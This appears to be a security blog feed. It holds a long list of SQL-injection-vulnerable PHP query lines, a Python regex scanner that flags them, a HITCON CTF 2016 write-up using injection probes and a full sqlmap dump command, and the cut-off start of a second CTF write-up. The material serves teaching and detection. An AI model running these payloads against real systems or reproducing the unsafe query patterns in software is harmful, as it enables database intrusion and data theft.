$Last = "SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' ORDER BY member.IDstd DESC LIMIT 0,1";
$strSQL =" UPDATE request_color a JOIN printer_color b ON a.RequestPC = b.Printer_Color_ID SET b.ColorTotalNumber = '$ColorBalance1' WHERE a.RequestID = '".$_GET["id"]."' ";
$strSQL1 = "UPDATE meeting_list SET mstatus = 'S' where id = '".$_GET["id"]."' ";
$CardSQL = "SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' LIMIT 0, 6";
SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' LIMIT 0, 6
$strSQL = "SELECT * FROM tblmember WHERE Email = '".trim($_POST['Email'])."' ";
$strSQL = "SELECT * FROM tblmember WHERE (FirstName LIKE '%".$_GET["txtKeyword"]."%' or Lastname LIKE '%".$_GET["txtKeyword"]."%' and Class='ผ่านการอนุมัติ') ";
$sql_mem = "update member set fname ='$_POST[fname]',name ='$_POST[name]',birthday ='$_POST[birthday]',address ='$_POST[address]',road ='$_POST[road]',district ='$_POST[district]',city ='$_POST[city]',province ='$_POST[province]',country ='$_POST[country]',zipcode ='$_POST[zipcode]',phone ='$_POST[phone]',fax ='$_POST[fax]',mobile ='$_POST[mobile]',email ='$_POST[email]' where usermem = '$_POST[usermem]'";
$sql = "update send_detail set open='1' where send_id='$_GET[send_id]' and user_id = $k ";
$sql="select * from book , send ,send_detail , user , typebook where send_detail.user_id = $a and send_detail.send_id = send.send_id and send.book_id = book.book_id and send.user_id = user.user_id and book.typebook_id = typebook.typebook_id and send.send_id = '$_GET[send_id]' ";
$sql="select * from user where user_name='$_POST[username]' and user_password='$_POST[password]'";
$sql2="select * from admin where admin_name='$_POST[username]' and admin_password='$_POST[password]' ";
$strSQL = "SELECT * FROM product WHERE Supplier_ID = '".$_GET["Supplier_ID"]."' ";
$sql="INSERT INTO chat (name, texts)VALUES ('$_POST[name]','$_POST[mes]');";
$strSQL = "SELECT * FROM accounts WHERE Username = '".trim($_POST['Username'])."' ";
$strSQL = "INSERT INTO accounts (Username,Password) VALUES ('".$_POST["Username"]."',
$strSQL = "INSERT INTO accounts (Username,Password) VALUES ('".$_POST["Username"]."', '$password')";
$sqlTb = "SELECT * FROM treatment where date='$_POST[date]'";
$sql1 ='SELECT * FROM member WHERE username = "'.$_POST['ulog'].'"';
$sql ="SELECT member.*,profile.* FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE 1 AND member.IDstd = '".$_POST['searchID']."' ";
//$sql="SELECT * FROM member WHERE IDstd like '".$_POST['IDstd']."'";
if($mysql->query(" SELECT * FROM [tb_student] WHERE [idStudent] like '".$_POST['ids']."'") > 0 ){
$sql="SELECT * FROM member WHERE IDstd like '".$_POST['IDstd']."'";
$sql = "INSERT INTO students ('name', 'last_name') VALUES('" . $_POST['student_name'][$i] . "', '" . $_POST['student_last_name'][$i] . "')";
$res = $mysqli->query("SELECT * FROM ven_rent WHERE id_van = ".$_GET['u']);
$strSQL = "SELECT * from objective WHERE ob_quiz_id = ".$_POST["chkColor"][$i]."";
$strSQL = "SELECT * FROM member WHERE Username = '".trim($_POST['txtUsername'])."' ";
$strSQL = "INSERT INTO member (Username,Password,Name,Status) VALUES ('".$_POST["txtUsername"]."',
$strSQL = "SELECT * FROM course WHERE Id_Course = '".$_GET["Id_Course"]."' ";
$sql1="SELECT * FROM user WHERE username='".$_GET['username']."'";
$sql = "select * from po where POID like '%{$_POST['POID']}%'";
$query = "SELECT * FROM teacher WHERE (T_user='".$_POST["txtT_user"]."') AND (T_pw='".$_POST["txtT_pw"]."')";
$test_query="SELECT * FROM login WHERE username = '".$_POST['form-username']."'";
$strSQL = "SELECT * FROM subject WHERE subject = '".trim($_POST['txtsubject'])."' ";
$strSQL = "INSERT INTO subject (subject,course_description) VALUES ('".$_POST["txtsubject"]."','".$_POST["txtcourse_description"]."')";
$strSQL = "SELECT * FROM course INNER JOIN type_course ON course.type_cou_id=type_course.tp_cou_id WHERE cou_id = '".$_GET['cou_id']."' ";
$strSQL = "SELECT * FROM po2016 WHERE Po_number = '".$_GET["Po_number"]."' ";
$strSQL1 = " SELECT * FROM drb_product WHERE drb_pd_code = 'GL-ES-".$_POST["drb_pd_codeSE"]."' ";
$strSQL2 = " SELECT * FROM drb_product_up WHERE drb_pd_codeT = '".$_POST["drb_pd_codeT"]."' ";
} else { $strSQL = "SELECT * FROM city WHERE ProvinceID ='".$_GET["proid"]."' ORDER BY CityNameT ASC";
} else { $strSQL = "SELECT * FROM district WHERE CityID ='".$_GET["ampid"]."' ORDER BY DistrictNameT ASC";
$strSQL = "SELECT * FROM webboard WHERE QuestionID = '".$_GET["QuestionID"]."' ";
$strSQL2 = "SELECT * FROM reply WHERE QuestionID = '".$_GET["QuestionID"]."' order by replyID desc";
$sql='SELECT * FROM tbl_member WHERE user = "'.$_POST['username'].'"';
$sql1="INSERT INTO tbl_member value ('','".$_POST['name']."','".$_POST['username']."','".$_POST['mail']."','".$_POST['tel']."')";
$strSQL2 = "SELECT * FROM orders_detail WHERE OrderID = '".$_GET["OrderID"]."' ";
$strSQL = "SELECT * FROM slideshow WHERE slide_title = '".$_GET["CusID"]."' ";
$up_Leave = "UPDATE leave_leave SET Quota_id='$_POST[Quota_id]',
$strSQL = "SELECT * FROM data_course WHERE cou_id = '".$_GET['cou_id']."' ";
$sql_select_playlista = "select * from playlist where p_playlist_name = '".$_GET['pid']."'order by p_Order ";
$strSQL = "SELECT * FROM quotas WHERE Quota_id = '".$_POST["Quota_id"]."' ";
$strSQL = "SELECT * FROM member WHERE Username = '".trim($_POST['txtUsername'])."'
$sql="select * from question where subject_id='$_GET[subject_id]' ";
$sql="select * from choice where question_id='$_GET[question_id]' ";
$strSQL = "SELECT * FROM it_rep_form WHERE rep_no = '".$_GET["rep_no"]."' ";
$strSQL = "SELECT * FROM customer WHERE 1 AND CustomerID = '".$_POST["sCusID"]."' ";
$strSQL = "SELECT hex(pic1) FROM 2016_mission WHERE mission_id = '".$_GET["mission_id"]."' ";
$strSQL = "SELECT * FROM product WHERE (id_prd LIKE '%".$_GET["txtKeyword"]."%' or ProductName LIKE '%".$_GET["txtKeyword"]."%' )";
$strSQL = "SELECT * FROM customer WHERE displayname = '".trim($_POST['txtUsername'])."'
$strSQL = "update customer set namecus=". "'". $_POST["name"] ."'". ",";
$sql="select * from allotment_item where hotel_id='".$_REQUEST["id"]."' and status='1' order by no_id ";
$sql2="SELECT * FROM joinus WHERE eventstypecode='".$_POST["eventstypecode"]."'";
$sql1="SELECT * FROM joinus WHERE passport = '".$_POST["scan"]."'";
$sq1 = INSERT INTO strengthkf(keyID, strID) VALUES ('.$_POST['chkKey'][$key].','.$strID.'); //get keyI">
$sq1 = "UPDATE strengthkf SET keyID = '".$_POST['chkKey'][$key]."'
$strSQL = "SELECT * FROM member WHERE MemberID = '".$_POST["MemberID"]."' ";
$strSQL = "UPDATE member SET Username = '".$_POST["Username"]."', Password = '".$_POST["Password"]."', Name_member = '".$_POST["Name_member"]."', Addr_member = '".$_POST["Addr_member"]."'
$strSQL = "SELECT product_id, Qty FROM orders_detail where order_detail_id = ".($_REQUEST['order_detail_id'] * 1);
$strSQL = "SELECT * FROM customer WHERE CustomerID = '".$_POST["CustomerID"]."' ";
$strSQL = "UPDATE customer SET Name_cus = '".$_POST["Name_cus"]."', Address = '".$_POST["Address"]."',
$strSQL1 = "SELECT * FROM tb_memfamily WHERE mem_id = '".$_GET['mem_id']."' ";
$strSQL = "SELECT * FROM product WHERE productno = '".$_GET["productno"]."'";
$sql_insert="INSERT INTO tbl_recived (a,b,c,d,e,f,g)VALUES('$_GET[a]','$_GET','$_GET[c]','$_GET[d]','$_GET[e]','$_GET[f]',NOW())";
INSERT INTO tbl_recived (a,b,c,d,e,f,g)VALUES('$_GET[a]','$_GET','$_GET[c]','$_GET[d]','$_GET[e]','$_GET[f]',NOW())";
$sql = "select * from diagnosis where di_opt1= '$_REQUEST[s1]' && di_opt2= '$_REQUEST[s2]' && di_opt3= '$_REQUEST[s3]' && di_opt4= '$_REQUEST[s4]' ";
$strSQL = "SELECT * FROM employee WHERE Department = '".$_POST["department"]."' "
$strSQL = "INSERT INTO koreanfood (con_name,con_email,con_phone,con_message) VALUES ('".$_POST["txt_name"]."',
$strSQL = "INSERT INTO koreanfood (con_name,con_email,con_phone,con_message,date) VALUES ('".$_POST["txt_name"]."',
$strSQL = "INSERT INTO info (Name,Skul,Age) VALUES ('".$_POST["txt_name"]."',
$sql="update tb_student set stu_name='$stu_name', address='$address', status='$status' where stu_id='{$_POST['txtid']}' ";
$sql="select * from tb_student where stu_id='{$_GET['id']}' ";
$sql="delete from tb_student where stu_id='{$_GET['id']}'";
$sql="UPDATE tb_student SET stu_name='$stu_name', address='$address', status='$status' where stu_id=".$_POST['txtid'];
$strSQL = "INSERT INTO orders (datetime,name,address,payment,date,tel,mail) VALUES ('".date("Y-m-d H:i:s")."','".$_POST["name"]."','".$_POST["address"]."','".$_POST["payment"]."','".$_POST["date"]."','".$_POST["tel"]."','".$_POST["mail"]."') ";
$sql = "SELECT * FROM menu WHERE menu_name LIKE ('".$_POST["search"]."')%";
$sqlr = "UPDATE proresult set EmployeeID='".$_POST['EmployeeID'][$i]."', Name='".$_POST['ResourceName'][$i]."', RoleName='".$_POST['RoleName'][$i]."', Category='".$_POST['ResourceCategory'][$i]."', Email='".$_POST['ResourceEmail'][$i]."', TelNo='".$_POST['ResourceTelNo'][$i]."', ResourceDeparment='".$_POST['ResourceDepartment'][$i]."' where ppid ='$ide'";
$sqlr = "UPDATE proresult set EmployeeID='".$_POST['EmployeeID'][$i]."',
$sqlr = "UPDATE proresult set EmployeeID='".$_POST['EmployeeID$i']."',
$strSQL2 = "INSERT INTO trans (datetime,name,address,date) VALUES ('".date("Y-m-d H:i:s")."','".$_POST["name"]."','".$_POST["address"]."' ,'".$_POST["date"]."') ";
$strSQL = "SELECT * FROM vehicle_tb WHERE (1 AND serial = '".$_POST["sserial"]."' OR assetNumber = '".$_POST["assetNumber"]."') and assetNumber !='' ";
$strSQL = "SELECT * FROM ordername WHERE id_order = '".$_GET["OrderID"]."' ";
$strSQL2 = "SELECT * FROM order_detial WHERE id_order = '".$_GET["OrderID"]."' ";
/*$strSQL = "INSERT INTO s_scroll (m_username,m_password,m_name ,m_lastname ,m_level) VALUES ('".$_POST["txtUsername"]."',
$strSQL = "INSERT INTO s_scroll (s_name, s_text, s_color, s_bg, s_font, s_size, s_speed) VALUES ('".$_POST["T_Name"]."','".$_POST["T_Text"]."','".$_POST["T_Color"]."','".$_POST["T_BG"]."','".$_POST["T_Font"]."','".$_POST["size"]."','".$_POST["speed"]."')";
$strSQL = "SELECT * FROM webboard WHERE QuestionID = '".$_GET["QuestionID"]."' ";
if(!mysqli_query($objCon,"INSERT INTO reply (QuestionID,CreateDate,Details,Name) VALUES ('".$_GET["QuestionID"]."','".date("Y-m-d H:i:s")."','".$_POST["txtDetails"]."','".$_POST["txtName"]."') ")){
$strSQL2 = "SELECT * FROM reply WHERE QuestionID = '".$_GET["QuestionID"]."' ";
$strSQL1 = "SELECT * FROM product WHERE ProductName LIKE('".$_GET["ProductName"]."')";
$strSQL = "SELECT * FROM member WHERE PerId = '".trim($_POST['txtPerId'])."' ";
$strSQL = "SELECT * FROM member WHERE DriveId = '".trim($_POST['txtDriveId'])."' ";
$strSQL = "SELECT * FROM member WHERE Tel = '".trim($_POST['txtTel'])."' ";
$strSQL = "SELECT * FROM member WHERE Email = '".trim($_POST['txtEmail'])."' ";
$strSQL = "UPDATE customer SET Name = '".$_POST["txtName"]."'
$strSQL = "SELECT * FROM addinform WHERE ID_Inform= '".$_GET["ID_Inform"]."' ";
$strCHECK = "SELECT * FROM checkstock WHERE shopcode = '".$_GET["shopcode"]."' AND productid = '".$_POST["productid$i"]."'";
$result = mysql_query("update product set qty = qty + '".$_POST["qty$i"]."' where ProductID = '".$_POST["productid$i"]."'");
$resultms = mysql_query("update ms set actqty = actqty - '".$_POST["qty$i"]."' where shopcode='".$_GET["shopcode"]."' AND productid = '".$_POST["productid$i"]."'");
$strCHECKms = "SELECT * FROM ms WHERE shopcode = '".$_POST["toshop"]."' AND productid = '".$_POST["productid$i"]."'";
$resultoshop = mysql_query("update ms set actqty = actqty + '".$_POST["qty$i"]."' where shopcode='".$_POST["toshop"]."' AND productid = '".$_POST["productid$i"]."'");
$strSQL = "SELECT * FROM person WHERE Person_ID LIKE '%".$_GET["txtKeyword"]."%' ";
$sql = "INSERT INTO durable_goods VALUES('$_POST[Dg_idtxt]',$Dg_Income,'$_POST[Dg_nametxt]' ,'$POST[Dg_Brandtxt]','$_POST[Dg_Typetxt]','$_POST[Dg_colourtxt]', '$_POST[Dg_Sizetxt]','$_POST[PriceToUnittxt]','$_POST[Dg_budgettxt]','$_POST[Notetxt]')";
$strSQL = "SELECT * FROM customer WHERE CustomerID = '".$_POST["lmName1"]."' ";
$sql = "SELECT * FROM news WHERE ID_News='{$_GET['ID_News']}' ";
$sql_a = "SELECT * FROM news WHERE ID_News='{$_GET['ID_News']}' ";
$strSQL2 = "SELECT * FROM location_area WHERE Locationname_id ='$_GET[Locationname_id]' ORDER BY Locationareaname_id ";
$strSQL = "SELECT * FROM location_areaname WHERE Locationname_id ='$_GET[Locationname_id]' ";
$strSQL2 = "SELECT * FROM location_area WHERE Locationname_id ='$_GET[Locationname_id]' ORDER BY Locationareaname_id ";
$strSQL2 = "SELECT * FROM location_area WHERE Locationname_id = '$_GET[Locationname_id]' ORDER BY Locationareaname_id";
$sqlp = "INSERT INTO app_pro (appid, proname, mod, prore, probcp)VALUES('$id', '".$_POST['procname'][$i]."', '".$_POST['idmod'][$i]."','".$_POST['prore'][$i]."','".$_POST['probpc'][$i]."' )";
$sqlp = "INSERT INTO app_pro (proname, mod, prore, probcp)VALUES( '".$_POST['proname'][$i]."', '".$_POST['mod'][$i]."','".$_POST['prore'][$i]."','".$_POST['probpc'][$i]."' )";
$strsql = "INSERT INTO test (name)VALUES('".$_POST['test'][$i]."')";
$sql = "SELECT fac_sci_name, category FROM facultysci WHERE sci_criteria <= '".$_POST['data1']."'";
$dbname = "SELECT * FROM teacher WHERE (name LIKE '%".$_GET["search"]."%' or phone LIKE '%".$_GET["search"]."%' )";
$strSQL = "SELECT * FROM comparison WHERE type = '".$_GET["type"]."' ";
Quote:$strSQL = "SELECT * FROM comparison WHERE type = '".$_GET["type"]."' ";
</pre>
<br />
If code like this is used in a real web application, a malicious party or hacker could break in and steal data from the database, or even take over the server hosting the web application. For preventing/fixing SQL Injection vulnerabilities, see OWASP: <a href="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet">https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet</a><br />
<br />
Idea + Regexp: <a href="https://github.com/laurent22/so-sql-injections">https://github.com/laurent22/so-sql-injections</a><br />
SQL Injection Prevention Cheat Sheet: <a href="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet">https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet</a><br />
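As an added example (not from the original post or the quoted forum code), here is a small Python scanner in the spirit of the grep/regexp idea above: it flags the two unsafe shapes seen in the list, a superglobal concatenated onto a SQL string with "." and a superglobal interpolated directly inside a double-quoted SQL string, while leaving prepared statements and intval() casts alone. The sample PHP lines are constructed in the same style.<br />

```python
import re

# Constructed sample PHP lines in the style of the grep results above
# (not taken from any real project). Lines 1-3 are unsafe, lines 4-5 are not.
SAMPLE_PHP = r"""$strSQL = "SELECT * FROM member WHERE Tel = '".trim($_POST['txtTel'])."' ";
$sql = "SELECT * FROM news WHERE ID_News='{$_GET['ID_News']}' ";
$strSQL2 = "SELECT * FROM location_area WHERE Locationname_id ='$_GET[Locationname_id]' ORDER BY id";
$stmt = $mysqli->prepare("SELECT * FROM member WHERE Tel = ?");
$sql = "SELECT * FROM news WHERE ID_News=".intval($_GET['ID_News']);
"""

SQL_KEYWORD = re.compile(r"\b(?:SELECT|INSERT|UPDATE|DELETE)\b", re.I)
SUPERGLOBAL = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")

# '".$_GET[...]  or  '".trim($_POST[...]: a string literal is closed and a
# superglobal (optionally wrapped in calls such as trim()) is concatenated with ".".
# intval() is treated as a sufficient cast and is not flagged.
CONCAT = re.compile(r"""["']\s*\.\s*(?:(?!intval\b)\w+\(\s*)*\$_(?:GET|POST|REQUEST|COOKIE)\b""")

# "...'$_GET[x]'..."  or  "...'{$_GET['x']}'...": the superglobal is interpolated
# directly inside a double-quoted string.
INTERP = re.compile(r'"[^"]*\{?\$_(?:GET|POST|REQUEST|COOKIE)\[[^"]*"')


def classify_line(line):
    """Return 'concat', 'interpolation' or None for one line of PHP source."""
    if not (SQL_KEYWORD.search(line) and SUPERGLOBAL.search(line)):
        return None
    if CONCAT.search(line):
        return "concat"
    if INTERP.search(line):
        return "interpolation"
    return None


def scan(source):
    """Scan PHP source text; return [(line_number, kind, line)] for each finding."""
    findings = []
    for number, line in enumerate(source.splitlines(), start=1):
        kind = classify_line(line)
        if kind:
            findings.append((number, kind, line.strip()))
    return findings


if __name__ == "__main__":
    for number, kind, line in scan(SAMPLE_PHP):
        print(f"line {number}: {kind:13} {line}")
```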
P.S. For educational purposes.
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-85448451835627833992016-10-10T11:46:00.001+07:002016-10-10T11:46:53.383+07:00HITCON CTF 2016: Are you rich? (Web) Write-up<b>Descriptions:</b><br />
<blockquote class="tr_bq">
Are you rich? Buy the flag!<br />
<a href="http://52.197.140.254/are_you_rich/">http://52.197.140.254/are_you_rich/</a><br />
<span style="color: red;">ps. You should NOT pay anything for this challenge</span><br />
Some error messages which are not related to the challenge have been removed</blockquote>
<b>Solution:</b><br />
<br />
1. The website has two functions, <b>Get our bitcoin address</b> and <b>Verify payment</b>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSy3Nt1_mojhjwEKB6ErynrrOxvBaCBIkw8ityePqBh_IAXjO6wQCJsjF1sAf_2Wui0KVhz9PbmpLUtwnRhWhYV4MyR-YBJeM52J0KrTytnqMghLjHMe2rlaDzEgdcgDCYPYlRyjt9mVGs/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="131" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSy3Nt1_mojhjwEKB6ErynrrOxvBaCBIkw8ityePqBh_IAXjO6wQCJsjF1sAf_2Wui0KVhz9PbmpLUtwnRhWhYV4MyR-YBJeM52J0KrTytnqMghLjHMe2rlaDzEgdcgDCYPYlRyjt9mVGs/s400/1.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
2. Clicking Get our bitcoin address generates a Bitcoin address and redirects to the verify page.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuHwpZ62Dk2hI23DrrEOJDEb5v7w54tYJtUXk7hylmFGGOaMXYsZi5EaXn_WjFy-t6uwyBox0GenWDT1C1iknpim8FWkI_StNwq0lfh0VfP1Ok6TbFJx1lNNCOCGSGl2k7-jnuh_UYmXxx/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuHwpZ62Dk2hI23DrrEOJDEb5v7w54tYJtUXk7hylmFGGOaMXYsZi5EaXn_WjFy-t6uwyBox0GenWDT1C1iknpim8FWkI_StNwq0lfh0VfP1Ok6TbFJx1lNNCOCGSGl2k7-jnuh_UYmXxx/s400/2.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
3. Not enough money. My guess is that after generating our Bitcoin address it is inserted into a database and Verify payment looks it up, so I try SQL Injection in the <b><i>Address</i></b> field.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
4. <b>' or 1=1#</b> --- Found more than 1 records?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLloMIfvCyLi_xBuGoUkEYiqp46ZxPKOPCw-yrT66dB_kgVwEawCj-fwXJrI1mbHpHEUdtsT-iXKikNtFPilyjuVuPDUbzXclWpfEveQk9AyesrCH96Ix09bb8hh49mzZ461JST93llr9J/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="184" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLloMIfvCyLi_xBuGoUkEYiqp46ZxPKOPCw-yrT66dB_kgVwEawCj-fwXJrI1mbHpHEUdtsT-iXKikNtFPilyjuVuPDUbzXclWpfEveQk9AyesrCH96Ix09bb8hh49mzZ461JST93llr9J/s320/3.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
5. <b>' or 1=2#</b> --- does not have enough confirmed money?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5TMQWdufsUbFYjoFe7QM9LxOEx29RhvYxL7BKg__CTAggPe_2gSleel78ej8VJxmlQ2uzNGEKhbhyphenhyphensMfiFdDEH5iOM9LgXigLEQNATou-615Rqg3mZprCU95Nc_Y9vVMQMRB6_4H7EEXt/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="117" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5TMQWdufsUbFYjoFe7QM9LxOEx29RhvYxL7BKg__CTAggPe_2gSleel78ej8VJxmlQ2uzNGEKhbhyphenhyphensMfiFdDEH5iOM9LgXigLEQNATou-615Rqg3mZprCU95Nc_Y9vVMQMRB6_4H7EEXt/s400/4.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
4. Having confirmed that the <b><i>address</i></b> parameter is vulnerable to <a href="https://www.owasp.org/index.php/SQL_Injection">SQL Injection</a>, I use <a href="https://portswigger.net/burp/">Burp Suite</a> to capture the HTTP request and copy it to a text file.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<pre class="brush:[php];">POST /are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c HTTP/1.1
Host: 52.197.140.254
Proxy-Connection: keep-alive
Content-Length: 79
Cache-Control: max-age=0
Origin: http://52.197.140.254
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://52.197.140.254/are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c
Accept-Encoding: gzip, deflate
Accept-Language: th,en;q=0.8
address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c&flag_id=flag1&submit=
</pre>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
5. Using the SQLmap -r option to load the HTTP request from the text file, SQLmap confirms the vulnerability is a <a href="https://www.owasp.org/index.php/Blind_SQL_Injection">Time-Based Blind SQL Injection</a>. The final SQLmap command used to get the flag:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<i><b>python sqlmap.py -r web50.txt -p address --threads=5 --technique=T --dbms=mysql --dbs --string="Found more than" -D areyourich -T flag1 -C flag --dump</b></i></div>
<div class="separator" style="clear: both; text-align: left;">
<i><b><br /></b></i></div>
<div class="separator" style="clear: both; text-align: left;">
6. Wait several minutes to retrieve the flag.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3R3PARXpbBm3gwdy9qwm2FtUMgFAyq0uu90tIPBExgzGH5kTct5APlDVg-vB5Bg8-w9qysOGmFL7zSteAIi4QzXZ_YlRjPziNfWN-3DfY8uyVRZRiCDsfHC8DXwVR2FVuWwDkqcKoMpfu/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3R3PARXpbBm3gwdy9qwm2FtUMgFAyq0uu90tIPBExgzGH5kTct5APlDVg-vB5Bg8-w9qysOGmFL7zSteAIi4QzXZ_YlRjPziNfWN-3DfY8uyVRZRiCDsfHC8DXwVR2FVuWwDkqcKoMpfu/s320/5.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In Burp Suite (Union Based)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuHD_x3WRLXEOAj0kJGPomhPrOYWFo0yNj2EmRSs5BzDp34FTP9OyxSOxO1GxRC-h8CjUYrmJ9gHImVLs0C65760OqLzLnvcylhKW_A0j98b_HxZuXHdUbAwIbmXo8ekknrAp8WEgICUH-/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuHD_x3WRLXEOAj0kJGPomhPrOYWFo0yNj2EmRSs5BzDp34FTP9OyxSOxO1GxRC-h8CjUYrmJ9gHImVLs0C65760OqLzLnvcylhKW_A0j98b_HxZuXHdUbAwIbmXo8ekknrAp8WEgICUH-/s400/6.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="color: red;">Flag: </span></b><b>hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}</b></div>
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com2tag:blogger.com,1999:blog-9154377361493966397.post-36945262640004839022016-10-10T11:46:00.000+07:002016-10-10T11:46:33.274+07:00HITCON CTF 2016: %%% (Web) Write-up<b>Descriptions:</b><br />
<blockquote class="tr_bq">
Although it is easy, I still made this challenge because it is useful in penetration testing.<br />
<a href="http://52.196.116.69/">http://52.196.116.69/</a></blockquote>
<b>Solution:</b><br />
<br />
1. Accessing the site gives a certificate error.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU4NxAfHhyphenhyphenv9880401lIBjXWZf3hhiiG67CTyqgQEh8pz6fvEmsneCDhNeHN4QawzOowitVWRdh4dJqZmZqeMsqffEHpZIIFekkzjO6SeoTDmYwF6u5-1QXwfIgpnwspfibllbsz8Pzco0/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU4NxAfHhyphenhyphenv9880401lIBjXWZf3hhiiG67CTyqgQEh8pz6fvEmsneCDhNeHN4QawzOowitVWRdh4dJqZmZqeMsqffEHpZIIFekkzjO6SeoTDmYwF6u5-1QXwfIgpnwspfibllbsz8Pzco0/s1600/1.PNG" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
2. View certificate.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPaDcaHSl1CMyYdq_OXAhdGn_AVCXhW4fajop7wajTkQBrKsE3_ge3MFTSIm6gdJKaAL-S1Nvu2Otf71r6C-oHWnk5nJZJRHJku2wc6VnZCUkrHZJyFTa7kFgHAoUrTWEdWaInZyvNpFHa/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPaDcaHSl1CMyYdq_OXAhdGn_AVCXhW4fajop7wajTkQBrKsE3_ge3MFTSIm6gdJKaAL-S1Nvu2Otf71r6C-oHWnk5nJZJRHJku2wc6VnZCUkrHZJyFTa7kFgHAoUrTWEdWaInZyvNpFHa/s400/2.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
3. The certificate names very-secret-area-for-ctf.orange.tw, so try adding it to the hosts file:</div>
